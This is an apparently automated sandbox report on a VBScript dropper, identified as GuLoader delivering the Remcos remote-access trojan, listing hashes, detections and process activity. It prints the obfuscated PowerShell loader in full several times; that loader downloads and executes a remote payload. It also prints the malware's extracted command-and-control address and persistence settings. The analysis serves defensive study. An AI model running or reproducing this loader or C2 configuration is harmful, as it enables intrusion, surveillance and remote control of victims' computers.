Windows Analysis Report
Brooming.vbs

Overview

General Information

Sample name: Brooming.vbs
Analysis ID: 1578025
MD5: fbcaeb4144c55d299c7703277c01c329
SHA1: bc1b38c0454d1badf6ce204029a856a971f156c1
SHA256: 6c6329c8ab3fa52c199cbbf9b270f8faaa05dc74d7f78cbd5ac8bbea61ef49bc
Tags: vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious names
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd 
n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az 
(SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2704 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd 
n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN None ManNKa,rTSell= Az 
(SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4000 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • remcos.exe (PID: 5932 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 6116 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 7164 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["154.216.20.209:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BNP8PO", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
              Source: amsi64_3664.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
              Source: amsi32_2704.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
              • 0xc2f3:$b2: ::FromBase64String(
              • 0xb3a3:$s1: -join
              • 0x4b4f:$s4: +=
              • 0x4c11:$s4: +=
              • 0x8e38:$s4: +=
              • 0xaf55:$s4: +=
              • 0xb23f:$s4: +=
              • 0xb385:$s4: +=
              • 0x157a8:$s4: +=
              • 0x15828:$s4: +=
              • 0x158ee:$s4: +=
              • 0x1596e:$s4: +=
              • 0x15b44:$s4: +=
              • 0x15bc8:$s4: +=
              • 0xbb96:$e4: Get-WmiObject
              • 0xbd85:$e4: Get-Process
              • 0xbddd:$e4: Start-Process
              • 0x16413:$e4: Get-Process

              System Summary

              Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", ProcessId: 1592, ProcessName: wscript.exe
              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-BNP8PO
              Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.86.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4000, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49820
              Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Brooming.vbs", ProcessId: 1592, ProcessName: wscript.exe
              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 4000, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-BNP8PO
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL 
CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoF
